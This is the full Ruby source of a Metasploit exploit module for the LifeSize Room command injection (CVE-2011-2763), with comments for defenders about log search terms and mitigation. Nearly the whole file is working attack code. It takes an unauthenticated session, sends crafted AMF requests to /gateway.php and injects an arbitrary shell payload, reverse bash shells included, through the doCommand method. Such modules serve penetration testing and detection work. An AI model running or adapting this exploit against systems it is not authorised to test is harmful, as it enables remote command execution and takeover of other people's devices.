rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/lifesize_room.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
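# Metasploit remote exploit module for the LifeSize Room OS command injection
# tracked as CVE-2011-2763 / OSVDB 75212 (versions 3.5.3 and 4.7.18 per the
# module description).
#
# Notes for defenders, derived from the requests this module sends:
# - No credentials are supplied at any step; the PHP session is obtained with
#   a plain GET to /interface/interface.php?uniqueKey=<13 digits>.
# - Two POSTs to /gateway.php follow, both with
#   Content-Type: application/x-amf. The first names
#   LSRoom_Remoting.amfphpLogin and LSRoom_Remoting.getHost; the second names
#   LSRoom_Remoting.doCommand and carries the command string, with the session
#   cookie repeated in the query string.
# - Those paths, the content type and the method names are usable as
#   web/proxy log search terms or IDS signature content.
# - Mitigation is to apply a vendor release that addresses CVE-2011-2763 and
#   to keep the appliance's web interface off untrusted networks.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata (name, references, payload constraints,
  # target and reliability notes) with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LifeSize Room Command Injection',
        'Description' => %q{
          This module exploits a vulnerable resource in LifeSize
          Room versions 3.5.3 and 4.7.18 to inject OS commands. LifeSize
          Room is an appliance and thus the environment is limited
          resulting in a small set of payload options.
        },
        'Author' => [
          # SecureState R&D Team - Special Thanks To Chris Murrey
          'Spencer McIntyre',
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2011-2763' ],
          [ 'OSVDB', '75212' ],
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          # The command is sent as a string with a two-byte length prefix
          # (see pack('n') in #exploit), hence the 65535 ceiling.
          'Space' => 65535, # limited by the two byte size in the AMF encoding
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic bash-tcp',
            }
        },
        'Platform' => [ 'unix' ],
        'Arch' => ARCH_CMD,
        'Targets' => [ [ 'Automatic', {} ] ],
        'DisclosureDate' => '2011-07-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
          'SideEffects' => UNKNOWN_SIDE_EFFECTS,
        }
      )
    )
  end

  # Runs the three-request sequence: obtain a PHP session, register it through
  # the AMF gateway, then send the doCommand request carrying the payload.
  #
  # Calls fail_with(Failure::NotFound, ...) when no session cookie can be
  # obtained or the validation request gets no response. The response to the
  # final request is not inspected here.
  def exploit
    print_status("Requesting PHP Session...")
    res = send_request_cgi({
      'encode' => false,
      'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
      'method' => 'GET',
    }, 10)

    if res.nil? || res.get_cookies.empty?
      fail_with(Failure::NotFound, 'Could not obtain a Session ID')
    end

    # A response can set cookies without including PHPSESSID; the original
    # chained split calls raised NoMethodError on nil in that case. Treat it
    # as the same "no session" failure instead.
    session_value = res.get_cookies.split('PHPSESSID=')[1].to_s.split('; ')[0]
    if session_value.nil? || session_value.empty?
      fail_with(Failure::NotFound, 'Could not obtain a Session ID')
    end

    sessionid = "PHPSESSID=#{session_value}"

    headers = {
      'Cookie' => sessionid,
      'Content-Type' => 'application/x-amf',
    }

    print_status("Validating PHP Session...")

    # AMF request naming two methods. The two bytes before each method name
    # are its length (0x1b = 27, 0x17 = 23).
    data = "\x00\x00\x00\x00\x00\x02\x00\x1b"
    data << "LSRoom_Remoting.amfphpLogin"
    data << "\x00\x02/1\x00\x00\x00"
    data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
    data << "LSRoom_Remoting.getHost"
    data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"

    res = send_request_cgi({
      'encode' => false,
      'uri' => '/gateway.php',
      'data' => data,
      'method' => 'POST',
      'headers' => headers,
    }, 10)

    # Only the presence of a response is checked, not its status or body.
    # fail_with raises, so nothing after it would run.
    fail_with(Failure::NotFound, 'Could not validate the Session ID') unless res

    print_status("Sending Malicious POST Request...")

    # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
    # The command string is prefixed with its length as a 16-bit big-endian
    # integer (pack('n')); it is followed by the 13-byte string
    # "upgradeStatus" (0x0d).
    amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19"
    amf_data << "LSRoom_Remoting.doCommand"
    amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
    amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
    amf_data << "\x02\x00\x0dupgradeStatus"

    # The session identifier is sent both in the Cookie header and in the
    # query string, so it will also show up in URL-based access logs.
    send_request_cgi({
      'encode' => false,
      'uri' => "/gateway.php?#{sessionid}",
      'data' => amf_data,
      'method' => 'POST',
      'headers' => headers
    }, 10)
  end
end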